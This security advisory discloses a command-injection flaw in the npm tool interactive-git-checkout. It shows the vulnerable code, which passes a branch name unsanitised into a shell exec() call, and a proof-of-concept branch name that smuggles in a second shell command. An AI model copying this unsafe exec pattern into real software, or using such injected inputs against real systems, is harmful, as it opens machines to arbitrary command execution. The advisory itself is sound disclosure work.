CVE-2025-59046
interactive-git-checkout has a Command Injection vulnerability
Description
The npm package `interactive-git-checkout` is an interactive command-line tool that lets users check out a git branch by prompting for the branch name on the command line. It is available as an npm package and can be installed via `npm install -g interactive-git-checkout`.

Resources:

* Project's npm package: https://www.npmjs.com/package/interactive-git-checkout

## Command Injection Vulnerability

The `interactive-git-checkout` tool is vulnerable to command injection because it interpolates the branch name into a `git checkout` command string and runs it through the Node.js `child_process` module's `exec()` function, which spawns a shell, without any input validation or sanitization. The following vulnerable code snippet demonstrates the issue:

```js
const { exec: execCb } = require('child_process');
const { promisify } = require('util');
const exec = promisify(execCb);

module.exports = async (targetBranch) => {
  const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);
  process.stderr.write(stderr);
  process.stdout.write(stdout);
};
```

## Exploit Proof of Concept

1. Install the `interactive-git-checkout` package (as suggested by the package's README):

```bash
npm install --global interactive-git-checkout
```

2. Run the executable exposed by the installed package:

```bash
$ igc
```

3. When prompted, enter the following branch name:

```bash
hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #
```

## Vulnerable versions

All versions of interactive-git-checkout are vulnerable to this issue, up to and including the latest version, `1.1.4`.

# Author

Liran Tal
How to fix CVE-2025-59046
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.
- No fixed version listed.
Is CVE-2025-59046 being exploited?
Low — EPSS is 0.5%, meaning exploitation activity has not been observed at scale.